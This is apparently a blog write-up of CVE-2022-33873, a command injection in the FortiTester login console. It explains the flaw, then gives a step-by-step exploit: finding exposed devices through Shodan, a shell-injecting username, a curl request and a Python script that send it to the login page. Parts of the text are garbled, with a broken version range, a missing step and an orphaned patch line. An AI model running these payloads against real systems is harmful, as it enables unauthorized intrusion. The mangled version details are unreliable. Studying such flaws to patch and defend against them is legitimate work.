CVE-2022-33873 - OS Command Injection in FortiTester Uncovered (with Exploit Example)

In this article, we’ll dive into a real-world vulnerability, CVE-2022-33873, that hit Fortinet’s FortiTester product line. This bug—a classic OS command injection—could let unauthenticated attackers run any command on the device, just by abusing the login console. Let’s break this down in plain English, look at what caused the issue, see how it can be exploited, and learn how you can stay safe.

Quick Summary

- CVE: CVE-2022-33873

7.. through 7.1.

- Type: OS Command Injection (CWE-78)

Impact: ANYONE (even unauthenticated!) could execute commands as if they had a real shell.

- Official Advisory: Fortinet PSIRT 2022-33873

What Happened?

The console login component of FortiTester (the web-based management GUI, not SSH) failed to properly check input coming from users. When you log in, your username is passed to the backend shell in a way that’s not properly “escaped.” If you craft your input a certain way, you can smuggle actual shell commands right through.

Here’s a simplified (Python-like pseudocode) version of what might have gone wrong

def login(user_input, password):
    # BAD! Dangerous system call
    os.system("auth_cli --user=" + user_input + " --pass=" + password)

If the user_input isn’t sanitized, you could enter

admin; whoami; #

Which gets turned by the app into

auth_cli --user=admin; whoami; # --pass=something

Now, the shell runs auth_cli --user=admin, then whoami, and ignores the rest (because of #, which is comment in bash). If whoami runs and prints “root,” the attacker just ran a command!

1. Find a Vulnerable FortiTester

Search for FortiTester instances. Shodan or Censys can help (legal usage only!). The login page will look something like:

https://<TARGET_IP>/cgi-bin/login.cgi

2. Craft Malicious Username

The goal is to inject extra shell commands with your "username”. Old-school, but it works!

Example username

admin; id; #

If the login form just does a POST, here’s a basic cURL example

curl -k -X POST https://victim.example/cgi-bin/login.cgi \
    -d "username=admin;id;#&password=whatever"

4. Observe the Response

If the *id* output appears somewhere (or you see errors related to shell commands), you’re in.

Sample Exploit Code (Python)

import requests

url = "https://victim.example/cgi-bin/login.cgi"
payload = "admin; id; #"
data = {"username": payload, "password": "a"}

r = requests.post(url, data=data, verify=False)
print(r.text)  # Look for 'uid=' in the response!

7.1.1 or newer.

- Restrict Access: Make FortiTester only accessible from a secure management network, never from the open internet.

References

- NVD: CVE-2022-33873
- Fortinet Advisory
- CWE-78: OS Command Injection

Conclusion

CVE-2022-33873 shows how even enterprise devices can have basic input mistakes with catastrophic results. If you run any Fortinet gear, patch ASAP and review your perimeter. A single command injection bug gives attackers the keys to the kingdom.

Stay safe—keep those systems up to date and test everything with a security mindset!


*This writeup is intended for education and defense only. Always have permission before testing any system you don’t own.*

Timeline

Published on: 10/18/2022 15:15:00 UTC
Last modified on: 10/21/2022 13:00:00 UTC